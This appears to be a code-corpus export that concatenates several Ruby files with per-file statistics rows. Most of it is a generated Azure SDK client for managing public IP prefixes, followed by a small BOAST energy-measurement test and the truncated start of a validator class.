attr_reader :client
#
# Deletes the specified public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIpPrefix.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
def delete(resource_group_name, public_ip_prefix_name, custom_headers:nil)
response = delete_async(resource_group_name, public_ip_prefix_name, custom_headers:custom_headers).value!
nil
end
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIpPrefix.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def delete_async(resource_group_name, public_ip_prefix_name, custom_headers:nil)
# Send request
promise = begin_delete_async(resource_group_name, public_ip_prefix_name, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Gets the specified public IP prefix in a specified resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIPPrefix.
# @param expand [String] Expands referenced resources.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefix] operation results.
#
def get(resource_group_name, public_ip_prefix_name, expand:nil, custom_headers:nil)
response = get_async(resource_group_name, public_ip_prefix_name, expand:expand, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the specified public IP prefix in a specified resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIPPrefix.
# @param expand [String] Expands referenced resources.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(resource_group_name, public_ip_prefix_name, expand:nil, custom_headers:nil)
get_async(resource_group_name, public_ip_prefix_name, expand:expand, custom_headers:custom_headers).value!
end
#
# Gets the specified public IP prefix in a specified resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIPPrefix.
# @param expand [String] Expands referenced resources.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(resource_group_name, public_ip_prefix_name, expand:nil, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'public_ip_prefix_name is nil' if public_ip_prefix_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/publicIPPrefixes/{publicIpPrefixName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'publicIpPrefixName' => public_ip_prefix_name,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version,'$expand' => expand},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Creates or updates a static or dynamic public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [PublicIPPrefix] Parameters supplied to the create or
# update public IP prefix operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefix] operation results.
#
def create_or_update(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
response = create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [PublicIPPrefix] Parameters supplied to the create or
# update public IP prefix operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
# Send request
promise = begin_create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
parsed_response = @client.deserialize(result_mapper, parsed_response)
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Updates public IP prefix tags.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [TagsObject] Parameters supplied to update public IP prefix
# tags.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefix] operation results.
#
def update_tags(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
response = update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [TagsObject] Parameters supplied to update public IP prefix
# tags.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
# Send request
promise = begin_update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
parsed_response = @client.deserialize(result_mapper, parsed_response)
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<PublicIPPrefix>] operation results.
#
def list_all(custom_headers:nil)
first_page = list_all_as_lazy(custom_headers:custom_headers)
first_page.get_all_items
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_all_with_http_info(custom_headers:nil)
list_all_async(custom_headers:custom_headers).value!
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_all_async(custom_headers:nil)
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/providers/Microsoft.Network/publicIPPrefixes'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefixListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets all public IP prefixes in a resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<PublicIPPrefix>] operation results.
#
def list(resource_group_name, custom_headers:nil)
first_page = list_as_lazy(resource_group_name, custom_headers:custom_headers)
first_page.get_all_items
end
#
# Gets all public IP prefixes in a resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(resource_group_name, custom_headers:nil)
list_async(resource_group_name, custom_headers:custom_headers).value!
end
#
# Gets all public IP prefixes in a resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param custom_headers [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(resource_group_name, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/publicIPPrefixes'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefixListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Deletes the specified public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIpPrefix.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_delete(resource_group_name, public_ip_prefix_name, custom_headers:nil)
response = begin_delete_async(resource_group_name, public_ip_prefix_name, custom_headers:custom_headers).value!
nil
end
#
# Deletes the specified public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIpPrefix.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_delete_with_http_info(resource_group_name, public_ip_prefix_name, custom_headers:nil)
begin_delete_async(resource_group_name, public_ip_prefix_name, custom_headers:custom_headers).value!
end
#
# Deletes the specified public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the PublicIpPrefix.
# @param custom_headers [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_delete_async(resource_group_name, public_ip_prefix_name, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'public_ip_prefix_name is nil' if public_ip_prefix_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/publicIPPrefixes/{publicIpPrefixName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'publicIpPrefixName' => public_ip_prefix_name,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:delete, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 204 || status_code == 202 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result
end
promise.execute
end
#
# Creates or updates a static or dynamic public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [PublicIPPrefix] Parameters supplied to the create or
# update public IP prefix operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefix] operation results.
#
def begin_create_or_update(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
response = begin_create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Creates or updates a static or dynamic public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [PublicIPPrefix] Parameters supplied to the create or
# update public IP prefix operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_create_or_update_with_http_info(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
begin_create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
end
#
# Creates or updates a static or dynamic public IP prefix.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [PublicIPPrefix] Parameters supplied to the create or
# update public IP prefix operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_create_or_update_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'public_ip_prefix_name is nil' if public_ip_prefix_name.nil?
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/publicIPPrefixes/{publicIpPrefixName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'publicIpPrefixName' => public_ip_prefix_name,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 201 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 201
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Updates public IP prefix tags.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [TagsObject] Parameters supplied to update public IP prefix
# tags.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefix] operation results.
#
def begin_update_tags(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
response = begin_update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Updates public IP prefix tags.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [TagsObject] Parameters supplied to update public IP prefix
# tags.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_update_tags_with_http_info(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
begin_update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:custom_headers).value!
end
#
# Updates public IP prefix tags.
#
# @param resource_group_name [String] The name of the resource group.
# @param public_ip_prefix_name [String] The name of the public IP prefix.
# @param parameters [TagsObject] Parameters supplied to update public IP prefix
# tags.
# @param custom_headers [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_update_tags_async(resource_group_name, public_ip_prefix_name, parameters, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'public_ip_prefix_name is nil' if public_ip_prefix_name.nil?
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Network::Mgmt::V2018_11_01::Models::TagsObject.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/publicIPPrefixes/{publicIpPrefixName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'publicIpPrefixName' => public_ip_prefix_name,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:patch, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefix.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefixListResult] operation results.
#
def list_all_next(next_page_link, custom_headers:nil)
response = list_all_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_all_next_with_http_info(next_page_link, custom_headers:nil)
list_all_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_all_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefixListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets all public IP prefixes in a resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefixListResult] operation results.
#
def list_next(next_page_link, custom_headers:nil)
response = list_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets all public IP prefixes in a resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_next_with_http_info(next_page_link, custom_headers:nil)
list_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Gets all public IP prefixes in a resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2018_11_01::Models::PublicIPPrefixListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets all the public IP prefixes in a subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefixListResult] which provide lazy access to pages of the
# response.
#
def list_all_as_lazy(custom_headers:nil)
response = list_all_async(custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_all_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
#
# Gets all public IP prefixes in a resource group.
#
# @param resource_group_name [String] The name of the resource group.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PublicIPPrefixListResult] which provide lazy access to pages of the
# response.
#
def list_as_lazy(resource_group_name, custom_headers:nil)
response = list_async(resource_group_name, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 42.574761 | 158 | 0.700035 |
aba1b96019d284cb0cdea1a4bdebcb318e7f106e | 44 | arr = [1, 5, 10, 20]
puts arr.find(&:even?)
| 14.666667 | 22 | 0.545455 |
62034c70711c50145ff20c5f9d50a357236e2406 | 1,366 | require 'minitest/autorun'
require 'BOAST'
require 'narray_ffi'
include BOAST
require_relative '../helper'
# Runs the given block with Ruby warnings disabled ($VERBOSE = nil).
#
# Bug fix: the previous version restored $VERBOSE with a plain statement, so
# an exception raised inside the block left warnings permanently silenced.
# The restore now lives in an +ensure+ clause.
#
# @param block [Proc] code to run with warnings silenced
# @return [Object] the block's return value
def silence_warnings(&block)
  warn_level = $VERBOSE
  $VERBOSE = nil
  block.call
ensure
  # Always restore the previous warning level, even if the block raises.
  $VERBOSE = warn_level
end
# Exercises BOAST's energy/powercap instrumentation: builds a small C kernel,
# runs it repeatedly, and checks that the measured power draw is stable.
class TestProcedure < Minitest::Test
  def test_powercap
    # BOAST symbolic declarations for the generated kernel's signature.
    n = Int( :n, :dir => :in )
    a = Int( :a, :dir => :in, :dim => [Dim(n)] )
    b = Int( :b, :dir => :in, :dim => [Dim(n)] )
    c = Int( :c, :dir => :inout, :dim => [Dim(n)] )
    i = Int( :i )
    j = Int( :j )
    # Kernel repeats the element-wise product 32K times so each run is long
    # enough for the energy counters to accumulate a measurable value.
    p = Procedure("vector_inc", [n, a, b, c]) {
      decl i
      decl j
      pr For(j, 1, 32*1024) {
        pr For(i, 1, n) {
          pr c[i] === a[i] * b[i]
        }
      }
    }
    r = []
    n = 1024
    ah = NArray.int(n)
    bh = NArray.int(n)
    ch = NArray.int(n)
    set_lang(C)
    ah.random!(n)
    bh.random!(n)
    ch.random!(n)
    k = p.ckernel
    # Warm up, then take two duration/energy samples.
    8.times { k.run(n, ah, bh, ch) }
    r = k.run(n, ah, bh, ch)
    t0 = r[:duration]
    e0 = r[:energy]
    8.times { k.run(n, ah, bh, ch) }
    r = k.run(n, ah, bh, ch)
    t1 = r[:duration]
    e1 = r[:energy]
    e0.each {|name, x|
      energy0 = e0[name.to_sym]
      energy1 = e1[name.to_sym]
      # Uncore counters and near-zero readings are too noisy to compare.
      next if name.to_s.include? 'uncore'
      next if energy0 < 0.01 and energy1 < 0.01
      # Power (energy / duration) should agree within 10% across samples.
      assert(((energy0 / t0 - energy1 / t1).abs) / (energy1 / t1) < 0.1)
    }
  end
end
| 22.032258 | 72 | 0.508053 |
26ced028c403dd45d25f80274938695cb3bd3839 | 3,176 | class EvidenceItemValidator < ActiveModel::Validator
def validate(record)
validator = valid_types[record.evidence_type]
if validator.blank?
